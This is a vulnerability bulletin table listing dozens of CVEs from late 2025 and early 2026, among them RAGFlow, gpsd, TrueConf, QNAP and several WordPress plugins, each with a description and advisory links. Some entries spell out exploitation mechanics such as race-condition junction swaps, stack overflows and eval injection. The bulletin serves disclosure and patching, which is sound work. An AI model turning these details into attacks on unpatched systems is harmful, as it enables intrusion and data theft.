| UxPlay--UxPlay | UxPlay 1.72 contains a double free vulnerability in its RTSP request handling. A specially crafted RTSP TEARDOWN request can trigger multiple calls to free() on the same memory address, potentially causing a Denial of Service. | 2025-12-29 | not yet calculated | CVE-2025-60458 | https://github.com/0pepsi/CVE-2025-60458 |
| SevenCs--ORCA | A local privilege escalation vulnerability exists in SevenCs ORCA G2 2.0.1.35 (EC2007 Kernel v5.22). The flaw is a Time-of-Check Time-of-Use (TOCTOU) race condition in the license management logic. The regService process, which runs with SYSTEM privileges, creates a fixed directory and writes files without verifying whether the path is an NTFS reparse point. By exploiting this race condition, an attacker can replace the target directory with a junction pointing to a user-controlled path. This causes the SYSTEM-level process to drop binaries in a location fully controlled by the attacker, allowing arbitrary code execution with SYSTEM privileges. The vulnerability can be exploited by any standard user with only a single UAC confirmation, making it highly practical and dangerous in real-world environments. | 2025-12-31 | not yet calculated | CVE-2025-61037 | https://gist.github.com/jc0818/233462416579661e4e2795f96457a6bf |
| nixseparatedebuginfod--nixseparatedebuginfod | nixseparatedebuginfod before v0.4.1 is vulnerable to directory traversal. | 2025-12-30 | not yet calculated | CVE-2025-61557 | https://github.com/symphorien/nixseparatedebuginfod https://github.com/symphorien/nixseparatedebuginfod/commit/57ac448324bfa11a8d8e8f9bea04ae9205ad18b2 https://github.com/symphorien/nixseparatedebuginfod/blob/05ff4edf6953d0bcfedc3f448ed0ad9c4f279ee9/advisories/CVE-2025-61557.md |
| ruby--uri | URI is a module providing classes to handle Uniform Resource Identifiers. In versions prior to 0.12.5, 0.13.3, and 1.0.4, a bypass exists for the fix to CVE-2025-27221 that can expose user credentials. When using the `+` operator to combine URIs, sensitive information like passwords from the original URI can be leaked, violating RFC3986 and making applications vulnerable to credential exposure. Versions 0.12.5, 0.13.3, and 1.0.4 fix the issue. | 2025-12-30 | not yet calculated | CVE-2025-61594 | https://www.ruby-lang.org/en/news/2025/10/07/uri-cve-2025-61594/ https://github.com/rubysec/ruby-advisory-db/blob/master/gems/uri/CVE-2025-61594.yml https://github.com/ruby/uri/commit/7e521b2da0833d964aab43019e735aea674e1c2c https://github.com/ruby/uri/commit/20157e3e29b125ff41f1d9662e2e3b1d066f5902 https://github.com/ruby/uri/commit/d3116ca66a3b1c97dc7577f9d2d6e353f391cd6a |
| QNAP Systems Inc.--HBS 3 Hybrid Backup Sync | A generation of error message containing sensitive information vulnerability has been reported to affect HBS 3 Hybrid Backup Sync. If an attacker gains local network access, they can then exploit the vulnerability to read application data. We have already fixed the vulnerability in the following version: HBS 3 Hybrid Backup Sync 26.2.0.938 and later | 2026-01-02 | not yet calculated | CVE-2025-62840 | https://www.qnap.com/en/security-advisory/qsa-25-46 |
| QNAP Systems Inc.--HBS 3 Hybrid Backup Sync | An external control of file name or path vulnerability has been reported to affect HBS 3 Hybrid Backup Sync. If an attacker gains local network access, they can then exploit the vulnerability to read or modify files or directories. We have already fixed the vulnerability in the following version: HBS 3 Hybrid Backup Sync 26.2.0.938 and later | 2026-01-02 | not yet calculated | CVE-2025-62842 | https://www.qnap.com/en/security-advisory/qsa-25-46 |
| QNAP Systems Inc.--QTS | A buffer overflow vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to modify memory or crash processes. We have already fixed the vulnerability in the following version: QTS 5.2.8.3332 build 20251128 and later | 2026-01-02 | not yet calculated | CVE-2025-62852 | https://www.qnap.com/en/security-advisory/qsa-25-51 |
| QNAP Systems Inc.--QuMagie | A cross-site scripting (XSS) vulnerability has been reported to affect QuMagie. The remote attackers can then exploit the vulnerability to bypass security mechanisms or read application data. We have already fixed the vulnerability in the following version: QuMagie 2.8.1 and later | 2026-01-02 | not yet calculated | CVE-2025-62857 | https://www.qnap.com/en/security-advisory/qsa-25-49 |
| Nuvation Energy--Battery Management System | A vulnerability in Nuvation Battery Management System allows Authentication Bypass. This issue affects Battery Management System: through 2.3.9. | 2026-01-02 | not yet calculated | CVE-2025-64119 | https://www.dragos.com/community/advisories/CVE-2025-64119 |
| Nuvation Energy--Multi-Stack Controller (MSC) | Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Nuvation Energy Multi-Stack Controller (MSC) allows OS Command Injection. This issue affects Multi-Stack Controller (MSC): from 2.3.8 before 2.5.1. | 2026-01-02 | not yet calculated | CVE-2025-64120 | https://www.dragos.com/community/advisories/CVE-2025-64119 |
| Nuvation Energy--Multi-Stack Controller (MSC) | Authentication Bypass Using an Alternate Path or Channel vulnerability in Nuvation Energy Multi-Stack Controller (MSC) allows Authentication Bypass. This issue affects Multi-Stack Controller (MSC): from 2.3.8 before 2.5.1. | 2026-01-02 | not yet calculated | CVE-2025-64121 | https://www.dragos.com/community/advisories/CVE-2025-64119 |
| Nuvation Energy--Multi-Stack Controller (MSC) | Insufficiently Protected Credentials vulnerability in Nuvation Energy Multi-Stack Controller (MSC) allows Signature Spoofing by Key Theft. This issue affects Multi-Stack Controller (MSC): through 2.5.1. | 2026-01-02 | not yet calculated | CVE-2025-64122 | https://www.dragos.com/community/advisories/CVE-2025-64119 |
| Nuvation Energy--Multi-Stack Controller (MSC) | Unintended Proxy or Intermediary vulnerability in Nuvation Energy Multi-Stack Controller (MSC) allows Network Boundary Bridging. This issue affects Multi-Stack Controller (MSC): through and including release 2.5.1. | 2026-01-02 | not yet calculated | CVE-2025-64123 | https://www.dragos.com/community/advisories/CVE-2025-64119 |
| Nuvation Energy--Multi-Stack Controller (MSC) | Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Nuvation Energy Multi-Stack Controller (MSC) allows OS Command Injection. This issue affects Multi-Stack Controller (MSC): before 2.5.1. | 2026-01-03 | not yet calculated | CVE-2025-64124 | https://www.dragos.com/community/advisories/CVE-2025-64119 |
| Nuvation Energy--nCloud VPN Service | A vulnerability in Nuvation Energy nCloud VPN Service allowed Network Boundary Bridging. This issue affected the nCloud VPN Service and was fixed on 2025-12-01 (December 2025). End users do not have to take any action to mitigate the issue. | 2026-01-03 | not yet calculated | CVE-2025-64125 | https://www.dragos.com/community/advisories/CVE-2025-64119 |
| discourse--discourse | Discourse is an open source discussion platform. Prior to versions 3.5.3, 2025.11.1, and 2025.12.0, an attacker who knows part of a username can find the user and their full name via UI or API, even when `enable_names` is disabled. Versions 3.5.3, 2025.11.1, and 2025.12.0 contain a fix. | 2025-12-30 | not yet calculated | CVE-2025-64528 | https://github.com/discourse/discourse/security/advisories/GHSA-c59w-jwx7-34v4 https://github.com/discourse/discourse/commit/1cb45b8b287597085e3514596ffb1d9b41938f81 https://github.com/discourse/discourse/commit/6192f55629624925595dae14364fd86cac0f09df https://github.com/discourse/discourse/commit/e936a523b5900a9d866d23ea3da904ba12bb0fb2 |
| SevenCs--ORCA | An incorrect NULL DACL issue exists in SevenCs ORCA G2 2.0.1.35 (EC2007 Kernel v5.22). The regService process, which runs with SYSTEM privileges, applies a Security Descriptor to a device object with no explicitly configured DACL. This condition could allow an attacker to perform unauthorized raw disk operations, which could lead to system disruption (DoS) and exposure of sensitive data, and may facilitate local privilege escalation. | 2025-12-31 | not yet calculated | CVE-2025-64699 | https://gist.github.com/GunP4ng/42b19ee99e94c315173b74a9fb26c2b9 |
| gosaliajainam--online-movie-booking | SQL injection in gosaliajainam/online-movie-booking 5.5 in movie_details.php allows attackers to gain sensitive information. | 2026-01-02 | not yet calculated | CVE-2025-65125 | https://github.com/TheAnhaj/CVE-Researches |
| GNU--Recutils | A divide-by-zero in the encryption/decryption routines of GNU Recutils v1.9 allows attackers to cause a denial of service (DoS) by supplying an empty value as the password. | 2025-12-30 | not yet calculated | CVE-2025-65409 | https://www.gnu.org/software/recutils/ http://ftp.gnu.org/gnu/recutils/ https://lists.gnu.org/archive/html/bug-recutils/2025-10/msg00004.html https://github.com/MAXEUR5/Vulnerability_Disclosures/blob/main/2025/CVE-2025-65409.md |
| GNU--Unrtf | A NULL pointer dereference in the src/path.c component of GNU Unrtf v0.21.10 allows attackers to cause a denial of service (DoS) via a crafted payload in the search_path parameter. | 2025-12-30 | not yet calculated | CVE-2025-65411 | https://www.gnu.org/software/unrtf/ https://savannah.gnu.org/projects/unrtf/ https://lists.gnu.org/archive/html/bug-unrtf/2025-11/msg00000.html https://sources.debian.org/src/unrtf/0.21.10-clean-1/src/main.c/#L661 https://github.com/MAXEUR5/Vulnerability_Disclosures/blob/main/2025/CVE-2025-65411.md |
| 201206030--novel | DOM-based Cross-Site Scripting (XSS) vulnerability in 201206030 novel V3.5.0 allows remote attackers to execute arbitrary JavaScript or disclose sensitive information (e.g., user session cookies) via a crafted "wvstest" parameter in the URL or via a malicious script injected into window.localStorage. The vulnerability arises from insufficient validation and encoding of user-controllable data in the book comment module: unfiltered user input is stored in the backend database (book_comment table, commentContent field), returned via the API, and then rendered directly into the page DOM through Vue 3's v-html directive without sanitization. Even where a browser's built-in XSS filtering blocks simple alert pop-ups, concealed payloads can bypass that interception and cause real harm. | 2025-12-29 | not yet calculated | CVE-2025-65442 | https://github.com/201206030/novel https://github.com/201206030/novel-front-web https://github.com/zero-day348/DOM-based-Cross-Site-Scripting-XSS-Vulnerability-in-novel-V3.5.0-CWE-79- |
| jsish--jsish | A type confusion in jsish 2.0 allows incorrect control flow during execution of the OP_NEXT opcode. When an "instanceof" expression uses an array element access as the left-hand operand inside a for-in loop, the instruction's implementation leaves an additional array reference on the stack rather than consuming it during OP_INSTANCEOF. As a result, OP_NEXT interprets the array as an iterator object and reads the iterCmd function pointer from an invalid structure, potentially causing a crash or enabling code execution depending on heap layout. | 2025-12-29 | not yet calculated | CVE-2025-65570 | https://blog.mcsky.ro/writeups/2025/11/15/inline8-writeup.html |
| Zeroheight--Zeroheight | An issue was discovered in Zeroheight (SaaS) prior to 2025-06-13. A legacy user creation API pathway allowed accounts to be created without completing the intended email verification step. While unverified accounts could not access product functionality, the behavior bypassed intended verification controls and allowed unintended account creation. This could have enabled spam/fake account creation or resource usage impact. No data exposure or unauthorized access to existing accounts was reported. | 2025-12-30 | not yet calculated | CVE-2025-65925 | https://github.com/Sneden/zeroheight-account-verification-bypass-CVE-2025-65925 |
| nanomq--nanomq | NanoMQ MQTT Broker (NanoMQ) is an all-around Edge Messaging Platform. Versions prior to 0.24.5 have a Heap-Use-After-Free (UAF) vulnerability within the MQTT bridge client component (implemented via the underlying NanoNNG library). The vulnerability is triggered when NanoMQ acts as a bridge connecting to a remote MQTT broker. A malicious remote broker can trigger a crash (Denial of Service) or potential memory corruption by accepting the connection and immediately sending a malformed packet sequence. Version 0.24.5 contains a patch. The patch enforces stricter protocol adherence in the MQTT client SDK embedded in NanoMQ: specifically, it ensures that CONNACK is always the first packet processed on the connection. This prevents the state confusion that led to the Heap-Use-After-Free (UAF) when a malicious server sent a malformed packet sequence immediately after connection establishment. As a workaround, validate the remote broker before bridging. | 2026-01-01 | not yet calculated | CVE-2025-66023 | https://github.com/nanomq/nanomq/security/advisories/GHSA-24f7-q5hh-27hf https://github.com/nanomq/nanomq/issues/2145 https://github.com/nanomq/NanoNNG/pull/1365 |
| inMusic Brands--Engine DJ | inMusic Brands Engine DJ 4.3.0 suffers from Insecure Permissions due to an exposed HTTP service in the Remote Library feature, which allows attackers to access all files and network paths. | 2025-12-30 | not yet calculated | CVE-2025-66723 | http://inmusic.com https://github.com/audiopump/cve-2025-66723 |
| TrueConf--TrueConf | An HTML Injection vulnerability in TrueConf server 5.5.2.10813 in the conference description field allows an attacker to inject arbitrary HTML in the Create/Edit conference functionality. The payload will be triggered when the victim opens the Conference Info page ([conference url]/info). | 2025-12-30 | not yet calculated | CVE-2025-66823 | https://trueconf.com https://github.com/x00nullbit/CVE-References/blob/main/CVE-2025-66823/README.md |
| TrueConf--TrueConf | A Stored Cross-Site Scripting (XSS) vulnerability exists in the Meeting location field of the Create/Edit Conference functionality in TrueConf Server v5.5.2.10813. The injected payload is stored via the meeting_room parameter and executed when users visit the Conference Info page, allowing attackers to achieve full Account Takeover (ATO). This issue is caused by improper sanitization of user-supplied input in the meeting_room field. | 2025-12-30 | not yet calculated | CVE-2025-66824 | https://trueconf.com https://github.com/x00nullbit/CVE-References/blob/main/CVE-2025-66824/README.md |
| TrueConf--TrueConf | A CSV Formula Injection vulnerability in TrueConf Server v5.5.2.10813 allows a normal user to inject malicious spreadsheet formulas into exported chat logs via crafted Display Name. | 2025-12-30 | not yet calculated | CVE-2025-66834 | https://trueconf.com https://github.com/x00nullbit/CVE-References/blob/main/CVE-2025-66834/README.md |
| TrueConf--TrueConf | TrueConf Client 8.5.2 is vulnerable to DLL hijacking via crafted wfapi.dll allowing local attackers to execute arbitrary code within the user's context. | 2025-12-30 | not yet calculated | CVE-2025-66835 | http://trueconf.com https://github.com/x00nullbit/CVE-References/blob/main/CVE-2025-66835/README.md |
| JD Cloud--JD Cloud | JD Cloud NAS routers AX1800 (4.3.1.r4308 and earlier), AX3000 (4.3.1.r4318 and earlier), AX6600 (4.5.1.r4533 and earlier), BE6500 (4.4.1.r4308 and earlier), ER1 (4.5.1.r4518 and earlier), and ER2 (4.5.1.r4518 and earlier) contain an unauthorized remote command execution vulnerability. | 2025-12-30 | not yet calculated | CVE-2025-66848 | http://jd.com https://www.notion.so/JD-Cloud-Unauth-RCE-2d22b76e8e0c802c975bf186b208d0c2 |
| GNU--binutils | An issue was discovered in function d_unqualified_name in file cp-demangle.c in binutils 2.26 that allows attackers to cause a denial of service via a crafted PE file. | 2025-12-29 | not yet calculated | CVE-2025-66861 | https://github.com/caozhzh/CRGF-Vul/blob/main/cxxfilt/crash1.md |
| GNU--binutils | A buffer overflow vulnerability in function gnu_special in file cplus-dem.c in binutils 2.26 allows attackers to cause a denial of service via a crafted PE file. | 2025-12-29 | not yet calculated | CVE-2025-66862 | https://github.com/caozhzh/CRGF-Vul/blob/main/cxxfilt/crash3.md |
| GNU--binutils | An issue was discovered in function d_discriminator in file cp-demangle.c in binutils 2.26 that allows attackers to cause a denial of service via a crafted PE file. | 2025-12-29 | not yet calculated | CVE-2025-66863 | https://github.com/caozhzh/CRGF-Vul/blob/main/cxxfilt/crash2.md |
| GNU--binutils | An issue was discovered in function d_print_comp_inner in file cp-demangle.c in binutils 2.26 that allows attackers to cause a denial of service via a crafted PE file. | 2025-12-29 | not yet calculated | CVE-2025-66864 | https://github.com/caozhzh/CRGF-Vul/blob/main/cxxfilt/crash5.md |
| GNU--binutils | An issue was discovered in function d_print_comp_inner in file cp-demangle.c in binutils 2.26 that allows attackers to cause a denial of service via a crafted PE file. | 2025-12-29 | not yet calculated | CVE-2025-66865 | https://github.com/caozhzh/CRGF-Vul/blob/main/cxxfilt/crash4.md |
| GNU--binutils | An issue was discovered in function d_abi_tags in file cp-demangle.c in binutils 2.26 that allows attackers to cause a denial of service via a crafted PE file. | 2025-12-29 | not yet calculated | CVE-2025-66866 | https://github.com/caozhzh/CRGF-Vul/blob/main/cxxfilt/crash6.md |
| libming--libming | Buffer overflow vulnerability in libming 0.4.8 in a strcat call (reported by AddressSanitizer in its strcat interceptor, asan_interceptors.cpp, which belongs to the sanitizer runtime rather than to libming). | 2025-12-29 | not yet calculated | CVE-2025-66869 | https://github.com/libming/libming/issues/366 |
| libming--libming | Buffer overflow vulnerability in function dcputchar in decompile.c in libming 0.4.8. | 2025-12-29 | not yet calculated | CVE-2025-66877 | https://github.com/libming/libming/issues/367 |
| Revotech--I6032W-FHW | An authentication bypass in the /cgi-bin/jvsweb.cgi endpoint of Revotech I6032W-FHW v1.0.0014 - 20210517 allows attackers to access sensitive information and escalate privileges via a crafted HTTP request. | 2026-01-02 | not yet calculated | CVE-2025-67158 | http://i6032w-fhw.com http://revotech.com https://github.com/Remenis/CVE-2025-67158 |
| Vatilon--Vatilon | Vatilon v1.12.37-20240124 was discovered to transmit user credentials in plaintext. | 2026-01-02 | not yet calculated | CVE-2025-67159 | http://vatilon.com https://github.com/Remenis/CVE-2025-67159 |
| Vatilon--Vatilon | An issue in Vatilon v1.12.37-20240124 allows attackers to access sensitive directories and files via a directory traversal. | 2026-01-02 | not yet calculated | CVE-2025-67160 | http://vatilon.com https://github.com/Remenis/CVE-2025-67160 |
| Nagios--Nagios XI | Nagios XI 2026R1.0.1 build 1762361101 is vulnerable to Directory Traversal in /admin/coreconfigsnapshots.php. | 2025-12-29 | not yet calculated | CVE-2025-67254 | https://www.nagios.org/ https://github.com/YongYe-Security/NagiosXI/tree/main |
| Nagios--Nagios XI | In Nagios XI 2026R1.0.1 build 1762361101, Dashboard parameters lack proper filtering, allowing any authenticated user to exploit a SQL Injection vulnerability. | 2025-12-29 | not yet calculated | CVE-2025-67255 | https://www.nagios.org/ https://github.com/YongYe-Security/NagiosXI/tree/main |
| gpsd--gpsd | gpsd before commit dc966aa contains a heap-based out-of-bounds write vulnerability in the drivers/driver_nmea2000.c file. The hnd_129540 function, which handles NMEA2000 PGN 129540 (GNSS Satellites in View) packets, fails to validate the user-supplied satellite count against the size of the skyview array (184 elements). This allows an attacker to write beyond the bounds of the array by providing a satellite count up to 255, leading to memory corruption, Denial of Service (DoS), and potentially arbitrary code execution. | 2026-01-02 | not yet calculated | CVE-2025-67268 | https://github.com/ntpsec/gpsd/commit/dc966aa74c075d0a6535811d98628625cbfbe3f4 https://github.com/ntpsec/gpsd/blob/master/drivers/driver_nmea2000.c https://github.com/Jaenact/gspd_cve/blob/main/CVE-2025-67268/README.md |
| gpsd--gpsd | An integer underflow vulnerability exists in the `nextstate()` function in `gpsd/packet.c` of gpsd versions prior to commit `ffa1d6f40bca0b035fc7f5e563160ebb67199da7`. When parsing a NAVCOM packet, the payload length is calculated using `lexer->length = (size_t)c - 4` without checking if the input byte `c` is less than 4. This results in an unsigned integer underflow, setting `lexer->length` to a very large value (near `SIZE_MAX`). The parser then enters a loop attempting to consume this massive number of bytes, causing 100% CPU utilization and a Denial of Service (DoS) condition. | 2026-01-02 | not yet calculated | CVE-2025-67269 | https://gitlab.com/gpsd/gpsd/-/commit/ffa1d6f40bca0b035fc7f5e563160ebb67199da7 https://gitlab.com/gpsd/gpsd https://github.com/Jaenact/gspd_cve/blob/main/CVE-2025-67269/README.md |
| composer--composer | Composer is a dependency manager for PHP. In versions on the 2.x branch prior to 2.2.26 and 2.9.3, attackers controlling remote sources that Composer downloads from might in some way inject ANSI control characters into the terminal output of various Composer commands, causing mangled output and potentially leading to confusion or DoS of the terminal application. There is no proven exploit, so the severity is low, but a CVE is published because the behaviour has potential for abuse and users should upgrade. Versions 2.2.26 and 2.9.3 contain a patch for the issue. | 2025-12-30 | not yet calculated | CVE-2025-67746 | https://github.com/composer/composer/security/advisories/GHSA-59pp-r3rg-353g https://github.com/composer/composer/commit/1d40a95c9d39a6b7f80d404ab30336c586da9917 https://github.com/composer/composer/commit/5db1876a76fdef76d3c4f8a27995c434c7a43e71 https://github.com/composer/composer/releases/tag/2.2.26 https://github.com/composer/composer/releases/tag/2.9.3 |
| golang--vscode-go | The Visual Studio Code Go extension (github.com/golang/vscode-go) is now disabled in Restricted Mode (Workspace Trust), so that opening an untrusted workspace cannot trigger unexpected execution of untrusted code. | 2025-12-29 | not yet calculated | CVE-2025-68120 | https://nvd.nist.gov/vuln/detail/CVE-2025-68120 https://groups.google.com/g/golang-dev/c/CHG4qfcicBU/m/4tanFUymDQAJ https://pkg.go.dev/vuln/GO-2025-4249 |
| agronholm--cbor2 | cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) serialization format. Starting in version 3.0.0 and prior to version 5.8.0, when a CBORDecoder instance is reused across multiple decode operations, values marked with the shareable tag (28) persist in memory and can be accessed by subsequent CBOR messages using the sharedref tag (29). This allows an attacker-controlled message to read data from previously decoded messages if the decoder is reused across trust boundaries. Version 5.8.0 patches the issue. | 2025-12-31 | not yet calculated | CVE-2025-68131 | https://github.com/agronholm/cbor2/security/advisories/GHSA-wcj4-jw5j-44wh https://github.com/agronholm/cbor2/pull/268 |
| SignalK--signalk-server | Signal K Server is a server application that runs on a central hub in a boat. In versions prior to 2.19.0, the appstore interface allows administrators to install npm packages through a REST API endpoint. While the endpoint validates that the package name exists in the npm registry as a known plugin or webapp, the version parameter accepts arbitrary npm version specifiers including URLs. npm supports installing packages from git repositories, GitHub shorthand syntax, and HTTP/HTTPS URLs pointing to tarballs. When npm installs a package, it can automatically execute any `postinstall` script defined in `package.json`, enabling arbitrary code execution. The vulnerability exists because npm's version specifier syntax is extremely flexible, and the SignalK code passes the version parameter directly to npm without sanitization. An attacker with admin access can install a package from an attacker-controlled source containing a malicious `postinstall` script. Version 2.19.0 contains a patch for the issue. | 2026-01-01 | not yet calculated | CVE-2025-68619 | https://github.com/SignalK/signalk-server/security/advisories/GHSA-93jc-vqqc-vvvh https://github.com/SignalK/signalk-server/releases/tag/v2.19.0 |
| infiniflow--ragflow | RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. In versions prior to 0.23.0, a low-privileged authenticated user (normal login account) can execute arbitrary system commands on the server host process via the frontend Canvas CodeExec component, completely bypassing sandbox isolation. This occurs because untrusted data (stdout) is parsed using eval() with no filtering or sandboxing. The intended design was to "automatically convert string results into Python objects," but this effectively executes attacker-controlled code. Additional endpoints lack access control or contain inverted permission logic, significantly expanding the attack surface and enabling chained exploitation. Version 0.23.0 contains a patch for the issue. | 2025-12-31 | not yet calculated | CVE-2025-68700 | https://github.com/infiniflow/ragflow/security/advisories/GHSA-8xw3-v6c2-j84j https://github.com/infiniflow/ragflow/commit/7a344a32f9f83529e12ca12f40f2657eb79fe811 |
| GoAhead-Webs--GoAhead-Webs | A stack-based buffer overflow exists in the GoAhead-Webs HTTP daemon on KuWFi 4G LTE AC900 devices with firmware 1.0.13. The /goform/formMultiApnSetting handler uses sprintf() to copy the user-supplied pincode parameter into a fixed 132-byte stack buffer with no bounds checks. This allows an attacker to corrupt adjacent stack memory, crash the web server, and (under certain conditions) may enable arbitrary code execution. | 2025-12-29 | not yet calculated | CVE-2025-68706 | https://kuwfi.com/products/kuwfi-gigabit-wireless-router-4g-lte-wifi-router-dual-band-portable-wifi-modem-hotspot-64-user-with-gigabit-wan-lan-rj11-port https://github.com/actuator/cve/tree/main/Kuwfi https://drive.proton.me/urls/HJCJYAC7JM#XtHcm3P7QaYk https://github.com/actuator/cve/blob/main/Kuwfi/CVE-2025-68706.txt |
| miniOrange--WordPress Social Login and Register | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in miniOrange WordPress Social Login and Register miniorange-login-openid allows PHP Local File Inclusion. This issue affects WordPress Social Login and Register: through 7.7.0. | 2025-12-30 | not yet calculated | CVE-2025-68974 | https://vdp.patchstack.com/database/Wordpress/Plugin/miniorange-login-openid/vulnerability/wordpress-wordpress-social-login-and-register-plugin-7-7-0-local-file-inclusion-vulnerability?_s_id=cve |
| Eagle-Themes--Eagle Booking | Authorization Bypass Through User-Controlled Key vulnerability in Eagle-Themes Eagle Booking eagle-booking allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Eagle Booking: through 1.3.4.3. | 2025-12-30 | not yet calculated | CVE-2025-68975 | https://vdp.patchstack.com/database/Wordpress/Plugin/eagle-booking/vulnerability/wordpress-eagle-booking-plugin-1-3-4-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Eagle-Themes--Eagle Booking | Missing Authorization vulnerability in Eagle-Themes Eagle Booking eagle-booking allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Eagle Booking: through 1.3.4.3. | 2025-12-30 | not yet calculated | CVE-2025-68976 | https://vdp.patchstack.com/database/Wordpress/Plugin/eagle-booking/vulnerability/wordpress-eagle-booking-plugin-1-3-4-3-settings-change-vulnerability?_s_id=cve |
| designthemes--DesignThemes Portfolio Addon | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in designthemes DesignThemes Portfolio Addon designthemes-portfolio-addon allows DOM-Based XSS. This issue affects DesignThemes Portfolio Addon: through 1.5. | 2025-12-30 | not yet calculated | CVE-2025-68977 | https://vdp.patchstack.com/database/Wordpress/Plugin/designthemes-portfolio-addon/vulnerability/wordpress-designthemes-portfolio-addon-plugin-1-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| designthemes--DesignThemes Core | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in designthemes DesignThemes Core designthemes-core allows DOM-Based XSS. This issue affects DesignThemes Core: through 1.6. | 2025-12-30 | not yet calculated | CVE-2025-68978 | https://vdp.patchstack.com/database/Wordpress/Plugin/designthemes-core/vulnerability/wordpress-designthemes-core-plugin-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| SimpleCalendar--Google Calendar Events | Authorization Bypass Through User-Controlled Key vulnerability in SimpleCalendar Google Calendar Events google-calendar-events allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Google Calendar Events: through 3.5.9. | 2025-12-30 | not yet calculated | CVE-2025-68979 | https://vdp.patchstack.com/database/Wordpress/Plugin/google-calendar-events/vulnerability/wordpress-google-calendar-events-plugin-3-5-9-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| designthemes--WeDesignTech Portfolio | Missing Authorization vulnerability in designthemes WeDesignTech Portfolio wedesigntech-portfolio allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WeDesignTech Portfolio: through 1.0.2. | 2025-12-30 | not yet calculated | CVE-2025-68980 | https://vdp.patchstack.com/database/Wordpress/Plugin/wedesigntech-portfolio/vulnerability/wordpress-wedesigntech-portfolio-plugin-1-0-2-broken-access-control-vulnerability?_s_id=cve |
| designthemes--HomeFix Elementor Portfolio | Missing Authorization vulnerability in designthemes HomeFix Elementor Portfolio homefix-ele-portfolio allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects HomeFix Elementor Portfolio: through 1.0.1. | 2025-12-30 | not yet calculated | CVE-2025-68981 | https://vdp.patchstack.com/database/Wordpress/Plugin/homefix-ele-portfolio/vulnerability/wordpress-homefix-elementor-portfolio-plugin-1-0-1-broken-access-control-vulnerability?_s_id=cve |
| designthemes--DesignThemes LMS Addon | Missing Authorization vulnerability in designthemes DesignThemes LMS Addon designthemes-lms-addon allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects DesignThemes LMS Addon: through 2.6. | 2025-12-30 | not yet calculated | CVE-2025-68982 | https://vdp.patchstack.com/database/Wordpress/Plugin/designthemes-lms-addon/vulnerability/wordpress-designthemes-lms-addon-plugin-2-6-broken-access-control-vulnerability?_s_id=cve |
| thembay--Greenmart | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Greenmart greenmart allows PHP Local File Inclusion. This issue affects Greenmart: through 4.2.11. | 2025-12-30 | not yet calculated | CVE-2025-68983 | https://vdp.patchstack.com/database/Wordpress/Theme/greenmart/vulnerability/wordpress-greenmart-theme-4-2-11-local-file-inclusion-vulnerability?_s_id=cve |
| thembay--Puca | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Puca puca allows PHP Local File Inclusion. This issue affects Puca: through 2.6.39. | 2025-12-30 | not yet calculated | CVE-2025-68984 | https://vdp.patchstack.com/database/Wordpress/Theme/puca/vulnerability/wordpress-puca-theme-2-6-39-local-file-inclusion-vulnerability?_s_id=cve |
| thembay--Aora | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Aora aora allows PHP Local File Inclusion. This issue affects Aora: through 1.3.15. | 2025-12-30 | not yet calculated | CVE-2025-68985 | https://vdp.patchstack.com/database/Wordpress/Theme/aora/vulnerability/wordpress-aora-theme-1-3-15-local-file-inclusion-vulnerability?_s_id=cve |
| Edge-Themes--Cinerama - A WordPress Theme for Movie Studios and Filmmakers | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Edge-Themes Cinerama - A WordPress Theme for Movie Studios and Filmmakers cinerama allows PHP Local File Inclusion. This issue affects Cinerama - A WordPress Theme for Movie Studios and Filmmakers: through 2.4. | 2025-12-30 | not yet calculated | CVE-2025-68987 | https://vdp.patchstack.com/database/Wordpress/Theme/cinerama/vulnerability/wordpress-cinerama-a-wordpress-theme-for-movie-studios-and-filmmakers-theme-2-4-local-file-inclusion-vulnerability?_s_id=cve |
| o2oe--E-Invoice App Malaysia | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in o2oe E-Invoice App Malaysia einvoiceapp-malaysia allows Retrieve Embedded Sensitive Data.This issue affects E-Invoice App Malaysia: from n/a through <= 1.1.0. | 2025-12-30 | not yet calculated | CVE-2025-68988 | https://vdp.patchstack.com/database/Wordpress/Plugin/einvoiceapp-malaysia/vulnerability/wordpress-e-invoice-app-malaysia-plugin-1-1-0-sensitive-data-exposure-vulnerability?_s_id=cve |
| Renzo Johnson--Contact Form 7 Extension For Mailchimp | Insertion of Sensitive Information Into Sent Data vulnerability in Renzo Johnson Contact Form 7 Extension For Mailchimp contact-form-7-mailchimp-extension allows Retrieve Embedded Sensitive Data.This issue affects Contact Form 7 Extension For Mailchimp: from n/a through <= 0.9.49. | 2025-12-30 | not yet calculated | CVE-2025-68989 | https://vdp.patchstack.com/database/Wordpress/Plugin/contact-form-7-mailchimp-extension/vulnerability/wordpress-contact-form-7-extension-for-mailchimp-plugin-0-9-49-sensitive-data-exposure-vulnerability?_s_id=cve |
